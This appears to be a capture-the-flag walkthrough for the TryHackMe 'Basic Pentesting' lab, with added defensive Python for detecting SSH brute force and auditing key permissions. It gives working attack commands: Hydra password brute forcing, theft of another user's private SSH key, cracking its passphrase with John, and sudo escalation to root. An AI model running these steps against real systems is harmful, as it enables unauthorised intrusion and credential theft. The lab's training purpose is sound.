https://tryhackme.com/room/basicpentestingjt
Note, any passwords have been redacted out only the process is shown below.
Enumeration
Port Scan (nmap)
This room has no text walkthrough and just a list of questions to answer, so it will be a good test of what we have learned so far!
First we need to do a port scan to see what ports we can uncover: nmap -sV -v 10.10.163.73
Directory Scan (Gobuster)
We have uncovered a webserver at port 80. Now we can fire up gobuster (or dirbuster) and enumerate for any interesting directories: gobuster dir -u 10.10.163.73 -w /usr/share/wordlists/dirb/common.txt
Directory Browse
Gobuster did find one: /development
There are two files here, dev.txt:
2018-04-23: I’ve been messing with that struts stuff, and it’s pretty cool! I think it might be neat to host that on this server too. Haven’t made any real web apps yet, but I have tried that example you get to show off how it works (and it’s the REST version of the example!). Oh, and right now I’m using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
and j.txt:
For J:
I’ve been auditing the contents of /etc/shadow to make sure we don’t have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.
-K
So now we know that there are at least two users, "j" and "k"; that "J" has a weak, easily crackable password; that SMB is set up; and that Apache Struts 2.5.12 is running (a separate component from the Apache httpd version nmap discovered).
We could look to see if there are any exploits for this version, and there is one: Apache Struts 2.5 < 2.5.12 RCE.
SMB Browse
We also know there is an SMB share. I ran smbclient -L 10.10.163.73 and saw there is an Anonymous share we could access with no username and password:
smbclient //10.10.163.73/Anonymous -U anonymous
We logged in successfully!
# see directory listing
smb: \> ls
. D 0 Thu Apr 19 13:31:20 2018
.. D 0 Thu Apr 19 13:13:06 2018
staff.txt N 173 Thu Apr 19 13:29:55 2018
There is an interesting file named staff.txt here! I tried to print staff.txt but we did not have permission. We will instead have to download the file to our local machine. Let's exit smbclient. Now that we know this file is right in the root of the Anonymous share, let's run:
smbget -U anonymous smb://10.10.163.73/Anonymous/staff.txt
And voila! We have the staff.txt file! Let’s read it:
cat staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
Alright! So now we know the two users from the /development directory are most likely Jan and Kay. We could get lucky and they are just using these as their usernames! Let’s save them to our compendium just in case.
Password Bruteforcing (Hydra)
We can now boot up Hydra and try to brute force the password for jan, since we know it is weak and has already been cracked before:
hydra -t 5 -l jan -P /usr/share/wordlists/rockyou.txt -vV 10.10.163.73 ssh
After several minutes (fortunately the password was in the top 1000 of rockyou.txt), we got the password! Let's add this back to our compendium, and we can now SSH in!
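From the defender's side, the same Hydra run leaves a burst of "Failed password" lines for jan in /var/log/auth.log, usually followed by an "Accepted password" from the same source once the guess lands. The Python below is an added example, not part of this walkthrough; it runs over constructed auth.log lines (source IP, timestamps and PIDs are invented) and flags any source that reaches a failure threshold inside a time window, noting whether a password login from that source succeeded afterwards.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines modelled on the hydra run against "jan".
# Source IP, timestamps and PIDs are invented for this example.
SAMPLE_AUTH_LOG = """\
Apr 23 15:58:01 basic2 sshd[1201]: Failed password for jan from 10.9.0.5 port 40122 ssh2
Apr 23 15:58:01 basic2 sshd[1202]: Failed password for jan from 10.9.0.5 port 40124 ssh2
Apr 23 15:58:02 basic2 sshd[1203]: Failed password for jan from 10.9.0.5 port 40126 ssh2
Apr 23 15:58:02 basic2 sshd[1204]: Failed password for jan from 10.9.0.5 port 40128 ssh2
Apr 23 15:58:03 basic2 sshd[1205]: Failed password for jan from 10.9.0.5 port 40130 ssh2
Apr 23 15:58:03 basic2 sshd[1206]: Failed password for invalid user admin from 10.9.0.5 port 40132 ssh2
Apr 23 15:59:10 basic2 sshd[1210]: Accepted password for jan from 10.9.0.5 port 40200 ssh2
Apr 23 16:04:07 basic2 sshd[1300]: Accepted publickey for kay from 192.168.56.102 port 51000 ssh2
Apr 23 16:10:00 basic2 sshd[1400]: Failed password for kay from 192.168.56.102 port 51002 ssh2
"""

TS = r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
FAILED_RE = re.compile(TS + r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPT_RE = re.compile(TS + r"Accepted (\w+) for (\S+) from (\S+) port \d+")


def parse_ts(text, year=2018):
    # syslog timestamps carry no year, so one has to be supplied
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {src_ip: {failures, users, success_after}} for every source with
    at least `threshold` failed logins inside any `window_seconds` window."""
    failures = defaultdict(list)  # ip -> [(ts, user)]
    accepts = defaultdict(list)   # ip -> [(ts, auth method)]
    for line in log_text.splitlines():
        if m := FAILED_RE.match(line):
            failures[m.group(3)].append((parse_ts(m.group(1)), m.group(2)))
        elif m := ACCEPT_RE.match(line):
            accepts[m.group(4)].append((parse_ts(m.group(1)), m.group(2)))
    alerts = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until events[start..end] fits in window_seconds
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                last_fail = events[end][0]
                # a password login from the same source after the burst is the "guessed it" signal
                success = any(ts >= last_fail and how == "password" for ts, how in accepts.get(ip, []))
                alerts[ip] = {"failures": len(events), "users": sorted({u for _, u in events}), "success_after": success}
                break
    return alerts
```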
Gain Access (SSH)
Now that we have access, let’s see what all we can do.
# first let's see where we are
jan@basic2:~$ pwd
/home/jan
# okay, good we are in jan's home folder.
# I will also cd .. and run ls -l see who owns the folder
jan@basic2:/home$ ls -l
total 8
drwxr-xr-x 2 root root 4096 Apr 23 2018 jan
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 kay
Unfortunately, Jan does not even own her own home folder (root does), which eliminates my plans to try to download a LinEnum script into her home folder to run. We will have to check out some hotspots manually:
# first, let's check crontab and see if there are any user tasks
# running as sudo we could exploit
jan@basic2:/home$ cat /etc/crontab
# at the very end we just see a #, which means there are no custom jobs
# now let's check important files such as /etc/passwd and /etc/shadow
# I just ls'd the directory but used grep to only grab those two
# file names
jan@basic2:/home$ ls -l /etc | grep 'passwd\|shadow'
-rw-r----- 1 root shadow 673 Apr 19 2018 gshadow
-rw------- 1 root root 665 Apr 19 2018 gshadow-
-rw-r--r-- 1 root root 1639 Apr 23 2018 passwd
-rw------- 1 root root 1602 Apr 19 2018 passwd-
-rw-r----- 1 root shadow 1085 Apr 23 2018 shadow
-rw------- 1 root root 963 Apr 19 2018 shadow-
Interestingly, everyone has read permissions on /etc/passwd! We can cat /etc/passwd to see if there is anything else useful. We do at least see the user kay in the file. We can also run cat /etc/group and see what memberships we have.
Here we can see kay is a member of several admin groups! Gaining access to her account would grant us much higher access. Let’s check out her home folder and see if there is anything there for us:
jan@basic2:~$ cd /home/kay
# now lets check for files
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
On first thought, we see a pass.bak file. However, our user does not have read permissions for it, so it is no use. If we look at the .ssh directory, we are allowed to read it! Let's cd in and see what we have:
jan@basic2:/home/kay$ cd .ssh
# look at the files
jan@basic2:/home/kay/.ssh$ ls -la
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
Well, that's not good! For Kay, at least. We can read her id_rsa file! With this, we can copy its contents and log in as her using the ssh command. Run cat id_rsa and copy all of it to a file on your local machine named id_rsa.
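The root cause here is the mode on the key, not SSH itself: a private key should be 0600, and sshd (with StrictModes yes, the default) also ignores an authorized_keys file that is group- or world-writable, which is exactly the -rw-rw-r-- shown above. As an added defender-side check that is not part of this walkthrough, the Python below parses an ls -la listing (the constructed sample is the .ssh listing from above plus pass.bak from the home listing) and reports the entries whose permissions undermine key-based authentication.

```python
import re

# Constructed sample: the `ls -la` listing of /home/kay/.ssh from the
# walkthrough above, pasted as plain text (pass.bak added from the home listing).
SAMPLE_LISTING = """\
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
"""

# mode, link count, owner, group, size, month, day, year-or-time, name
LS_RE = re.compile(r"^([-dl][rwxsStT-]{9})\+?\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$")
PRIVATE_KEY_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519"}


def mode_bits(mode_str):
    """Convert an ls-style mode such as '-rw-r--r--' to its octal permission bits (0o644)."""
    bits = 0
    for i, ch in enumerate(mode_str[1:]):
        if ch not in "-ST":  # lowercase s/t mean the execute bit is set as well
            bits |= 1 << (8 - i)
    return bits


def audit_ssh_listing(listing):
    """Return (name, severity, reason) tuples for entries whose modes undermine key-based SSH auth."""
    findings = []
    for line in listing.splitlines():
        m = LS_RE.match(line)
        if not m:
            continue
        mode_str, _owner, _group, name = m.groups()
        mode = mode_bits(mode_str)
        if mode_str[0] == "d":
            if mode & 0o022:
                findings.append((name, "CRITICAL", f"directory writable by group/other (mode {mode:o})"))
            continue
        if name in PRIVATE_KEY_NAMES and mode & 0o077:
            findings.append((name, "CRITICAL", f"private key readable by others (mode {mode:o}, expected 600)"))
        elif name == "authorized_keys" and mode & 0o022:
            findings.append((name, "HIGH", f"authorized_keys writable by group/other (mode {mode:o}); StrictModes ignores it"))
        elif name.endswith(".bak") and mode & 0o044:
            findings.append((name, "MEDIUM", f"backup file readable by others (mode {mode:o})"))
    return findings
```

On a live host the same check is what `find ~/.ssh -type f -perm /077` would surface; the parser form lets you run it over listings captured in a report like this one.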
Now we can exit our SSH session as jan and be back in our own terminal. One of the other issues with this id_rsa file is that it's encrypted with AES-128-CBC, so even if we try to use it, it will ask us for a passphrase that we do not yet know. We can use a script called ssh2john to try and crack the passphrase on the key:
# on kali it is installed already in the listed directory
# otherwise you can wget the script from above and run it that way
# this will output the file into a format john the ripper can decode
┌──(kali㉿kali)-[~/thm]
└─$ python /usr/share/john/ssh2john.py /home/kali/thm/id_rsa > crack.txt
# now we can run john the ripper on it for the passphrase
┌──(kali㉿kali)-[~/thm]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
-redacted- (/home/kali/thm/id_rsa)
Great, now we know the passphrase for the id_rsa key! Let’s use this to login.
┌──(kali㉿kali)-[~/thm]
└─$ ssh -i "/home/kali/thm/id_rsa" kay@10.10.163.73
Enter passphrase for key '/home/kali/thm/id_rsa':
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$
We’re in!
Now, if we remember from before, there was an interesting file in kay's home directory named pass.bak. We are already logged into her home directory, so let's just cat pass.bak. And now we have her actual password!
We can run sudo -l, enter that super long password, and we see that this user can run all commands as sudo!
kay@basic2:~$ sudo -l
[sudo] password for kay:
Matching Defaults entries for kay on basic2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kay may run the following commands on basic2:
(ALL : ALL) ALL
So let's elevate even higher and run sudo /bin/bash. Now we have a terminal as root!
kay@basic2:~$ sudo /bin/bash
root@basic2:~# whoami
root
For our final step, let's cd into root's home directory (cd /root) and grab that flag: cat flag.txt
Machine Compendium
All the information about our target machine, I continually update this as we discover more info!
{
  "MACHINE_IP": "10.10.163.73",
  "MACHINE_INFO": {
    "os": "Ubuntu Linux",
    "commonName": ""
  },
  "OPEN_PORTS": {
    "22": ["ssh", "OpenSSH 7.2p2 Ubuntu 4ubuntu2.4"],
    "80": ["http", "Apache httpd 2.4.18"],
    "139": ["netbios-ssn", "Samba smbd 3.X - 4.X (workgroup: WORKGROUP)"],
    "445": ["netbios-ssn", "Samba smbd 3.X - 4.X (workgroup: WORKGROUP)"],
    "8009": "ajp13?",
    "8080": "http-proxy"
  },
  "CREDENTIALS": {
  },
  "OTHER_INFO": {
    "vulnerabilities": ["CVE 2017-9805 - Apache RCE"],
    "notable_web_dir": ["/development"]
  }
}